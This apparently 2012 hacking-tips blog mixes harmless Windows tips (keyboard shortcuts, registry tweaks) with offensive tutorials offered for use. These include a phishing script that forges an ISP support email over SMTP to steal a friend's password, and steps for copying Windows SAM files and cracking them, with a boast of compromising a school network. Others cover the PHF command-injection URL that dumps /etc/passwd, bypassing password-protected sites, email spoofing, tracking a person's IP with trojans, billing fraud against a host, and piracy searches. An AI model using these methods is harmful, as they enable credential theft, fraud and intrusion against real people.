Note: If you choose to try different values, keep in mind that reserving too much RAM for your NIC will decrease the amount of RAM available for applications, while reserving too little might not give the desired effect

3. Additional Thoughts
1. The only negative effect of the System.ini IRQ tweak is that it will reduce the amount of RAM available for running applications a bit, by reserving some specifically for your Network Card's use. The gain in performance usually outweighs the negative effect by far, considering any Computer with 32Mb of RAM or more
2. This tweak may or may not work for you. It is not a documented tweak by Windows
3. Keep in mind that if you add hardware to your system the IRQ of the Network Adapter might change, in which case you will need to modify the setting in System.ini
4. In systems with multiple NICs, you might want to add the setting for both IRQs. Also, you could reserve RAM for other IRQs if you wish, just use common sense and don't forget it reduces the amount of RAM available for running applications
5. If you are using an USB device, it does not have a specific IRQ, however you can try adding the entry using the IRQ of the USB Controller
6. For internal Cable Modems, you'd have to add the entry using the IRQ of your modem, rather than the IRQ of a Network Card



RESULTS WILL VARY
No matter how good your systems may be, they're only as effective as what you put into them.

Friday 3 August 2012

 How to Get someones ISP password.



1.) run your telnet program:
on windows , go to START -> RUN -> "TELNET".
on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
3.) now , write the following :

mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".

note: No moeny will be returned if you don't follow our instructions!

thank you,
the support team!

4.) press enter twice and then write "."(without the "") and press ENTER!

--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .

[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?

[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".

[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".

[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"

"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..

* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".

* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)

* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!

Friday 20 July 2012

how to make a new web site

how to make a new web site



http://www.make-a-web-site.com/
http://www.pagetutor.com/pagetutor/makapage/index.html
www.webmonkey.com

Colour Palletes
http://colormatch.dk

HTMLlock <---Need

http://www.devside.net
http://www.devside.net/download/crypto/disclaimer1.html

well, if you want text seperate from image, you could just do this:






your text here, it's totally fun, yeah yeah yeah







if you want to have the image on the left side, and text on the right side, just reverse the code like so:











your text here, it's totally fun, yeah yeah yeah

Monday 16 July 2012

executable to shutdown or restart ur computer

executable to shutdown or restart ur computer


open notepad
type the command 
 cd\
cls
shutdown -r -f -t 10

save as .bat file and then press enter to it
file is created
to logoff use l for r
to shutdown don's use r

Sunday 8 July 2012

HOW TO GET ANY WINDOWS PASSWORD

HOW TO GET ANY WINDOWS PASSWORD

if it is FAT filesystem...

just copy the sam file like stated in the first post to an empty floppy disk and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...

if it is NTFS....

u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.

use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....

AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 howver, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.

I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any english dictionary. I haven't used LC5 yet.

If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windowz pass.

Programs needed: SAMInside (doesn't matter which version or if demo)
LC4 or LC5 (lophtcrack)( must be full version)
NTFSPro (doesn't matter if demo)
any bootdisk maker

Cracked or full version software can be found on any warez site. If u don"t know what that is or where to get the programs, post a message and I'll tell u or give them to u.

P.S: I might not keep track of this forum, because I'm going to create a new topic and post tutorial there. if u want to post, plz post there.

Hacking Password Protected Website's




Hacking Password Protected Website's By Pinglocalhost    
           
************************


There are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

         Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in     www.target.com/images,    there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in    www.target.com/games,   and if it isa valid directory, you again get a text listing of all the files available there.

          For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.

     We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find  /target.  When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find    /target/games/zip/zipindex.html .  This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url    www.target.com/games/zip/zipindex.html   you will be onthe index page and ready to follow the links for downloading.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
(DISCLAIMER)XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
The Info Above Is Lame!!!. I Dont Condone The Use Of This Document In A Malisous Manner. I Suggest That U Dont Do it But U Do What Ever U Want. I Will Not Be Responsible For Any Thing That Might Happen To U If U Use This.  :)

Google secrets



Google secrets

--------------------------------------------------------------------------------

method 1
?ww.google.com

put this string in google search:

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

voila!

method 2
?ww.google.com

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

Google Crack Search


Google Crack Search


just type crack: app name

example: crack: flashget 1.6a


http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=crack%3A+flashget+1.6a

Hacking Webpages


Hacking Webpages



Chapter 4: Hacking Webpages

Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password.  This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.

Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted pw from a shadowed
pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system. 1.The first step that you would take is
to download or copy the file. 2. The second step is to find a password
cracker and a dictionary maker. Although it's nearly impossible to find a
good cracker there are a few ok ones out there. I recomend that you look
for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper.
Now for a dictionary maker or a dictionary file...  When you start a
cracking prog you will be asked to find the the password file. That's where
a dictionary maker comes in. You can download one from nearly every hacker
page on the net.  A dictionary maker finds all the possible letter
combinations with the alphabet that you choose(ASCII, caps, lowercase, and
numeric letters may also be added) .  We will be releasing our pasword file
to the public soon, it will be called, Psychotic Candy, "The Perfect Drug."
As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives
you.


The PHF Technique

Well I wasn't sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But since I have been asked questions about the phf
I decided to include it.

The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).

The best way to get root is with an exploit. Exploits are explained in the
next chapter.

Saturday 7 July 2012

Get unlimited bandwidth from your host for free


Get unlimited bandwidth from your host for free



Get unlimited bandwidth from your host for free


NOTE: This applies only to specific hosting companies, due to the
specific setup needed and does have its drawbacks.

While setting up hosting space with a specific company I often deal
with, I noticed that they used a shared IP. (IP shared by two or more
websites/domains.) Well, the rates for unlimited bandwidth were
around $50+ per month, which I found unreasonable. I didnt require
much space, and didnt want to be limited to a mere 3 gig of traffic
per month.

Back on track... When setting up the acct, the hosting company needs
to know the domain name so that they can direct it accordingly.
(example: 'http://www.123.4.567.890/~user1/ ,
'http://www.123.4.567.890/~user2/ etc)

At this point you can give a url that doesnt belong to you at all. As
long as the nameservers dont change, that should have absolutly no
negative effects on you or your site whatsoever.

How it works is this:
The host propogates you a certain amount space on its servers, and
monitors the traffic that enters their space through the domain its
registered under. Being that the domain isn't connected to the site
at all, it registers ZERO traffic.

Zero traffic registered = can't possibly go over bandwidth
restrictions
can't possibly go over bandwidth restrictions = free unlimited
bandwidth

Now the problems with this (besides the ethical ones) is that your
host may offer X amount of mail addys with the acct
(you@y...) and these will not work, as the name isnt on their
DNS. However, some domain companies allow you to set it up
regardless. Another problem seems to be strictly cosmetic, but can be
highly problematic... Once you attach the domain you want onto the
site, each page comes up/w the ip/UN the host propagated to your
acct. Its at this point where you have to have a phenominal 10-15
character alphanumerical or better (#, &, etc) pw, or your site will
be vulnerable to attack since the attacker already has your UN. This
only gives attackers a slight advantage as the amount of time it
would take to brute force a 10 character pw @ a rate of 1,000,000 per
second is 10 years. Add numbers and case sensitivity to that and it
becomes approx 26,980 years.

While I'm on it, I may as well add that if you use this method,
obviously you are going to be using the lowest cost hosting plan
available, which in turn will offer the least amount of space. Thats
why free hosts were invented.

Free hosts suck as a general rule. Who wants a site smothered in ads?
However, if you upload all your programs, graphics and other large
files (have a backup of course) to a reliable free host and target
them accordingly from your site you have just freed up a signifigant
amount of space. The only setback/w this is having to keep an index
card or file around/w your pws, as you should never use the same one
twice, and want to use complicated ones.

gettin-someones-ip-address

gettin-someones-ip-address



An Ip adress stands for internet protocall adress this is need to insure that the information you are sending over the net arrives at the right computer. Therefor ever IP adress should be unique and no 2 computers should share the adress. An Ip adress does not give you controll of a computer but its vital if you want to attempt to connect to it with an IP adress you can attempt DoS attacks or just a connection to a service.

There are a number of ways to get someones IP,

1)Pagers - A pager is a program that works like a trojan on the victims computer once run it adds its self to start up and whenever the computer connects to the internet it sends and email or commonly an ICQ page giving the IP adress of the computer.

2)Sniffers - Sniffers work by detecting connections to your computer. Generaly they work by fooling them into thinking your hosting a website then giving you thier IP when they connect to it, a good program that does this is "ass sniffer" the problem with this method is that they can be using a proxy.

3)IRC - If your using a "reall" (snigger) IRC client like (snigger) Mirc then a simple command will return the IP of any body on the server adn it is!
/dns therenick how ever again they could be using a proxy though its less likely

4)Email - If you recieve and email from them and you view the headers you should see orginating IP this should be theres, again Proxys can be used so be carefull

5)MSN - Yes the MSN netstat trick to do this properly, launch your MS-DOS command line in a window (assuming your using windows) and run netstat -n kepp the window open and without doing anything else start the file transfer and run netstat again, there will be a new IP this is theres. NOTE: They might be using a proxy in which case you won;t get their IP also if your running a proxy then you'll be connected to your proxy! and won't get the IP

6)Websites - Get them to connect to a website you own but include this code in the source (PS I don't do javascript so it might not be right)

{form METHOD="POST" ACTION="Yourcgithiing.cgi" NAME="contents" ID="Form1"}
{input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT"}

(obviously use the greater than and less than charcters, but the forums don't like em)

Add a submit button and get them to press it, if you've set up your cgi script etc correctly then you get an email.

7)Asking - If you ask really nicely they might hand it over, bullshitting a little bit might help too!

8)ICQ - If they are running ICQ and are shareing some files then there are programs that will quite simply return the IP adress that corresponds to a UIN (I don't think proxys portect them here)

9)Convincing them to play an online game like age of empires (yay go microsoft) if you can convince them to host the game they have to give you their ip adress so you can connect to play the game.

Friday 6 July 2012

General Keyboard Shortcuts


 CONNECT ON FACEBOOK--- FACEBOOK.COM/LOVEWASE13

General Keyboard Shortcuts
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
SHIFT five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CTRL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)

Monday 2 July 2012

Restricting Control Panel






Restricting Control Panel 

Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoControlPanel and set its value to 1


Restricting Task Manager





Restricting Task Manager 

Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\System
Create new DWORD DisableTaskMgr and set its value to 1

Disable USB Autorun to Save PC from USB Viruses





Disable USB Autorun to Save PC from USB Viruses
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"

Sunday 1 July 2012

Email Forge, sends email from anyone


Email Forge, sends email from anyone

 1. Some ISP's block port 25 so it might not work

2. Most likely, you won't be able to see what yer typing

First of all, you need an SMTP server. These are extremely common and, in fact, I'll provide one for you (mail.hotmail.com). SMTP: Simple Mail Transfer Protocol. This service runs on port 25 (in most cases) and is used to send outgoing email.

Now, open up the command prompt and telnet to mail.hotmail.com on port 25 (note: to see what you type, type telnet and enter then type in set local_echo):



code:--------------------------------------------------------------------------------
telnet mail.hotmail.com 25
--------------------------------------------------------------------------------


When yer connected type in (except what's in between *'s; you chose what will go in the []):

code:--------------------------------------------------------------------------------
helo
*wait*
mail from:[whoever]@[whoever.com]
*wait*
rcpt to:[whoever]@[whoever.com]
*wait*
data
*wait*
[write]
[whatever you want]
[in]
[as many]
[lines as wished]
.
*wait*
quit
--------------------------------------------------------------------------------


Helo is just a handshake with the server. Mail from: is FROM who you want the email to be. rcpt to: is who you want the email to go to. under data is what you want sent. the '.' ends data. quit quits. There! simple isn't it.